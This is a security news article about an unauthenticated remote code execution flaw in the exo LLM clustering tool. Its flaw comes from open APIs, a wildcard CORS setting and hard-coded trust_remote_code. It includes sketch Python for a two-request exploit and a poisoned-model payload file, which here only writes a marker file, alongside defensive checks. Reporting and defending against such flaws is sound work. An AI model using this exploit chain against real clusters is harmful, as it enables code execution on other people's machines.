Unauthenticated RCE in exo Raises Alarms About Security in Open Source AI Infrastructure
Mar 4
The rapid rise of AI-assisted software development has reshaped how developers build applications. But as the ecosystem around large language models expands, security researchers are warning that some of the tools powering this new generation of development may be outpacing their own security architecture.
New research from Immersive highlights a remote code execution vulnerability in the open source AI orchestration platform exo, a tool designed to distribute large language model workloads across multiple machines. The issue reveals a broader challenge emerging across the fast-growing ecosystem of open source AI infrastructure: platforms built to accelerate experimentation often lack hardened security controls.
Kevin Breen, Senior Director of Cyber Threat Research at Immersive, says the discovery reflects a deeper problem within the rapidly evolving AI development landscape.
“Rushed and Vibe Coded ‘just ship it’ style code is making its way into the ecosystem, and it doesn't have the same level of code review,” Breen wrote in his analysis. “In some cases, we see people with no developer experience, unfamiliar with code lifecycles, vibe coding applications without the concept of security or code review.”
The Rise of AI Development Platforms
Large language models have become deeply embedded in the modern developer workflow. Engineers now routinely rely on AI tools to write, review, and debug code. These models can be accessed through cloud services such as Claude, Gemini, or OpenAI's systems, or they can be deployed locally using self-hosted models.
Both approaches come with tradeoffs.
Cloud-based models provide high performance and easy integration but require organizations to send proprietary code and internal data to external platforms. Running models locally gives developers full control over their data but requires powerful hardware and more complex infrastructure.
As a result, a growing number of developers are turning to open source orchestration tools that manage local AI clusters. Platforms like exo allow multiple machines to work together to run large models that would otherwise require expensive enterprise hardware.
But this rapid adoption has also created a new category of infrastructure that often lacks the mature security controls seen in traditional enterprise software.
A Cluster With No Authentication
The vulnerability uncovered by Breen begins with a design choice that prioritizes ease of setup over security.
exo allows nodes to automatically discover each other and form clusters without requiring authentication or configuration. While convenient for experimentation, the default setup exposes APIs that can be accessed by any device on the same network.
During testing, Breen deployed a simple cluster consisting of three Ubuntu virtual machines. The system came online quickly and the nodes connected automatically.
The problem was that the cluster exposed its API on all network interfaces without authentication or access restrictions.
This meant that any system on the same network could interact with the platform’s management endpoints.
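To see how little an attacker, or a defender auditing their own network, needs in order to find an exposed node, consider the minimal probe below. It is a sketch, not part of the research: the LAN address is made up, and 52415 is exo's documented default API port, worth confirming against your own deployment.

```python
# Minimal reachability probe, run from a second machine on the same network.
# The address is hypothetical; 52415 is exo's documented default API port.
import requests

NODE = "http://192.168.1.50:52415"  # hypothetical LAN address of an exo node

try:
    resp = requests.get(NODE, timeout=3)
    # Any HTTP response at all means the service is reachable without
    # credentials -- there is no authentication layer to reject the request.
    print(f"exo node reachable: HTTP {resp.status_code}")
except requests.ConnectionError:
    print("no exo node listening at this address")
```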
The issue is compounded by the platform’s permissive cross-origin resource sharing (CORS) configuration, which allows any website to send requests to the API.
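exo’s actual source is not reproduced here, but the pattern is common enough to sketch. In a minimal aiohttp service (exo is a Python project), a permissive CORS setup looks roughly like the following, with the wildcard origin header doing the damage; the endpoint name is hypothetical.

```python
# Illustration only -- not exo's source. This is the general shape of a
# permissive CORS setup: answering "*" tells browsers that scripts from
# ANY website may call these endpoints.
from aiohttp import web

async def handler(request: web.Request) -> web.Response:
    resp = web.json_response({"status": "ok"})
    # The dangerous part: no origin allowlist, every website is accepted.
    resp.headers["Access-Control-Allow-Origin"] = "*"
    return resp

app = web.Application()
app.router.add_get("/state", handler)  # hypothetical endpoint

if __name__ == "__main__":
    # Binding to 0.0.0.0 exposes the API on every network interface.
    web.run_app(app, host="0.0.0.0", port=52415)
```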
Turning a Model Into an Attack Vector
The most serious risk appears when users add new AI models to the cluster.
exo allows developers to specify models hosted on Hugging Face repositories. The platform automatically downloads and loads the model along with any supporting files needed to run it.
Inside the code responsible for loading these models, Breen discovered that the system enables a Hugging Face feature that allows models to include custom Python code that runs during initialization.
Normally this feature requires user approval because executing remote code from model repositories can be dangerous.
In exo, however, the option is enabled by default.
“TRUST_REMOTE_CODE” is hard-coded to true, meaning that any model loaded from a repository can execute arbitrary code during initialization.
This effectively turns the model loading process into a potential execution path for malicious code.
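Stripped to its essence, the risky pattern looks like the snippet below. This is a hedged reconstruction using the standard Hugging Face transformers API rather than exo’s exact source, and the repository name is a placeholder.

```python
# The risky pattern, reduced to its essence. In Hugging Face transformers,
# trust_remote_code=True lets a repository ship its own Python classes,
# which are downloaded and imported during model loading.
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained(
    "some-org/some-model",   # placeholder: any repo an API caller can name
    trust_remote_code=True,  # hard-coded: the repo's code runs on load
)
```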
Exploiting the Weakness
To demonstrate the risk, Breen created a malicious model hosted on Hugging Face that contained a small piece of Python code designed to run when the model was loaded.
Once the model was published, triggering the exploit required only two API calls.
The first request instructs the cluster to download the model from the repository. The second request deploys the model instance to the cluster.
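In outline, the attack traffic could look like the sketch below. The endpoint paths and JSON fields are hypothetical placeholders standing in for exo’s management API, which may differ between versions; only the two-step shape is taken from the research.

```python
# Sketch of the two-step trigger. Paths and fields are hypothetical
# placeholders for exo's management API.
import requests

API = "http://192.168.1.50:52415"  # hypothetical victim node
REPO = "attacker/poisoned-model"   # hypothetical malicious Hugging Face repo

# Step 1: instruct the cluster to download the model from the repository.
requests.post(f"{API}/download", json={"model": REPO}, timeout=30)

# Step 2: deploy the model instance. Initialization imports the repo's
# custom Python code, which is where the payload executes.
requests.post(f"{API}/deploy", json={"model": REPO}, timeout=30)
```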
When the model initializes, the malicious code executes on the host system.
In the proof-of-concept demonstration, the payload simply wrote a file to a temporary directory to prove that execution had occurred. In a real attack scenario, the payload could perform far more damaging actions.
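What might such a repository-side payload look like? The sketch below is an illustrative reconstruction, not Breen’s actual proof of concept: a Python file whose module-level code runs the moment transformers imports it, before any model weights are touched. The repository’s config would point to this file through its custom-code mapping.

```python
# modeling_poisoned.py -- a sketch of the kind of repo-side file that
# trust_remote_code will import. (Illustrative reconstruction, not the
# researcher's actual PoC.) Module-level code executes on import, before
# any weights load.
import pathlib
import tempfile

# Benign proof-of-execution payload, mirroring the writeup: drop a marker
# file in a temp directory. A real attacker could run anything here.
marker = pathlib.Path(tempfile.gettempdir()) / "exo_rce_poc.txt"
marker.write_text("code execution via model load\n")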
Because the cluster exposes its API on the local network, attackers with network access could trigger the exploit directly. And because of the permissive CORS policy, a malicious web page could issue the same requests from a victim’s browser, allowing attackers to exploit the cluster when a user simply visits a specially crafted site.
The Security Gap in Open Source AI
While the vulnerability itself may not be widely exploitable across the public internet, researchers say it highlights a systemic issue across the rapidly growing ecosystem of open source AI tools.
Small projects that suddenly gain popularity can attract thousands of users before their codebase undergoes serious security scrutiny.
AI orchestration platforms are particularly sensitive because they often control systems with powerful GPUs, large datasets, and automation capabilities.
As organizations experiment with self hosted AI infrastructure, these platforms may end up inside corporate networks or research environments where a compromise could expose valuable intellectual property.
Patches Released but Risks Remain
The developers behind exo responded quickly after being notified and released a patch that removes the default remote code trust behavior.
However, other security concerns remain.
The platform still lacks authentication controls and continues to allow unrestricted cross-origin API access. Security researchers recommend isolating AI clusters on dedicated networks and monitoring logs to detect unexpected models being loaded into the system.
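One lightweight way to act on that monitoring advice is to compare each node’s Hugging Face cache against an allowlist. The sketch below assumes the standard cache layout under ~/.cache/huggingface/hub; the allowlist entry is just an example.

```python
# Diff the Hugging Face cache on a node against an allowlist of approved
# models. The cache stores repos as models--<org>--<name> directories.
import pathlib

ALLOWED = {"meta-llama/Llama-3.1-8B-Instruct"}  # example allowlist entry
CACHE = pathlib.Path.home() / ".cache" / "huggingface" / "hub"

for entry in sorted(CACHE.glob("models--*")):
    # Recover "org/name" from the "models--org--name" directory name.
    repo_id = entry.name.removeprefix("models--").replace("--", "/", 1)
    if repo_id not in ALLOWED:
        print(f"unexpected model in cache: {repo_id}")
```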
Breen credited the development team for that responsiveness. Even so, the discovery illustrates a larger trend.
As AI tools become easier to build and distribute, the software supply chain around them is expanding rapidly. Without stronger security practices and code review processes, vulnerabilities in these platforms could become an increasingly attractive target for attackers.
In the race to build the infrastructure behind the AI revolution, security may be struggling to keep pace.


